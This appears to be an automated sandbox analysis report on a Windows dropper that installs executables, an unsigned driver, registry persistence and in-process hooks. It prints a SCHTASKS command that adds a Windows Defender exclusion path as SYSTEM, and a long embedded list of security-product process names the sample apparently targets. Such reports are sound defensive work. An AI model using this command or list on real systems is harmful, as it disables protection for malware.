Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: tbcore3u.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Section loaded: tbcore3u.dll
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Section loaded: tbcore3u.dll

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: 1387457-38765948.15.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 1387457-38765948.15.exe

Static file information: File size 30954656 > 1048576

Source: 1387457-38765948.15.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200

Source: 1387457-38765948.15.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1387457-38765948.15.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1387457-38765948.15.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1387457-38765948.15.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1387457-38765948.15.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1387457-38765948.15.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 1387457-38765948.15.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\BuildAgent\work\897482836e9bb448\_bin\Release\ps64ldr.pdb source: 1387457-38765948.15.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 4fkch1.exe, 00000027.00000002.3565592607.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3565404898.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 00000027.00000000.2806122888.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 00000028.00000000.2828514970.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 00000028.00000002.2835065898.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 12xy9.exe, 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 12xy9.exe, 00000029.00000000.2833145012.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 12xy9.exe, 0000002C.00000002.2856238979.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 12xy9.exe, 0000002C.00000000.2844020447.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 4fkch1.exe, 0000002D.00000002.2858016988.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 0000002D.00000000.2849028962.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 12xy9.exe, 0000002E.00000002.3329102867.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 12xy9.exe, 0000002E.00000000.3323172379.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 4fkch1.exe, 0000002F.00000002.3334645534.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 0000002F.00000000.3328740598.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 12xy9.exe.39.dr, 4fkch1.exe.5.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe, 00000004.00000000.2323491028.0000000140014000.00000002.00000001.01000000.00000008.sdmp, cajXRH.exe, 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmp, cajXRH.exe, 00000005.00000000.2341314704.0000000140014000.00000002.00000001.01000000.00000008.sdmp, cajXRH.exe.0.dr

Source: 1387457-38765948.15.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1387457-38765948.15.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1387457-38765948.15.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1387457-38765948.15.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1387457-38765948.15.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Unpacked PE file: 39.2.4fkch1.exe.5130000.6.unpack
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Unpacked PE file: 39.2.4fkch1.exe.5190000.7.unpack

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: initial sample

Static PE information: section where entry point is pointing to: .mo:

Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\G1f92m\12xy9.exe

Code function: 41_2_008A2691 push ecx; ret

41_2_008A26A4

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\1387457-38765948.15.exe	File created: C:\Users\user\Documents\cajXRH.exe			Jump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	File created: C:\Program Files (x86)\G1f92m\12xy9.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	File created: C:\Users\user\Documents\cajXRH.exe	Jump to dropped file
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	File created: C:\Program Files (x86)\G1f92m\tbcore3U.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Documents\cajXRH.exe	File created: C:\Program Files (x86)\4fkch1\tbcore3U.dll	Jump to dropped file
Source: C:\Users\user\Documents\cajXRH.exe	File created: C:\Program Files (x86)\4fkch1\4fkch1.exe	Jump to dropped file

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Program Files (x86)\4fkch1\4fkch1.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe

4_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\cajXRH.exe	Memory written: PID: 1456 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Memory written: PID: 1456 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Memory written: PID: 7108 base: 7FFE22370008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Memory written: PID: 7108 base: 7FFE2220D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 2492 base: F00005 value: E9 8B 2F 00 76	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 2492 base: 76F02F90 value: E9 7A D0 FF 89	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 2492 base: F30005 value: E9 8B 2F FD 75	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 2492 base: 76F02F90 value: E9 7A D0 02 8A	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 2892 base: 1090005 value: E9 8B 2F E7 75
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 2892 base: 76F02F90 value: E9 7A D0 18 8A
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Memory written: PID: 5604 base: 15D0005 value: E9 8B 2F 93 75
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Memory written: PID: 5604 base: 76F02F90 value: E9 7A D0 6C 8A
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Memory written: PID: 1892 base: 16E0005 value: E9 8B 2F 82 75
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Memory written: PID: 1892 base: 76F02F90 value: E9 7A D0 7D 8A
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 5840 base: 2970005 value: E9 8B 2F 59 74
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 5840 base: 76F02F90 value: E9 7A D0 A6 8B
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Memory written: PID: 6508 base: 15C0005 value: E9 8B 2F 94 75
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Memory written: PID: 6508 base: 76F02F90 value: E9 7A D0 6B 8A
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 1780 base: 5F0005 value: E9 8B 2F 91 76
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Memory written: PID: 1780 base: 76F02F90 value: E9 7A D0 6E 89

Source: C:\Users\user\Documents\cajXRH.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C4790FC
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C51183C
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C58B056
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C43BC04
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C538647
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C5C2F48
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C51C0AF
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C3EDE34
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 39CC7B9
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 39840CE
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 39EE627
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 3961F74
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 39B5D5F
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 3D7B700
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 3D30981
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 39C336B
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C4BF34F
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C47A03F
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C57A702
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C4D080B
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C46F12B
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BE59F9E
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BE4CBDE
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD7F34F
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BE3A702
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD2F12B
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD92089
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BE66E74
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD53E38
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD55143
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BE41EB4
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD390FC
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C599F9E
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BE97912
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BDDC0AF
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD887B1
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C49FFCB
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C4C87B1
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD2F34F
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BDFB056
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BE09F9E
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BD387B1
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BE16E74
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	API/Special instruction interceptor: Address: 6BCDF12B
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C581EB4
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C5E7C0E
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	API/Special instruction interceptor: Address: 6C5A6E74

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 4fkch1.exe, 00000027.00000002.3566922150.000000000368D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EX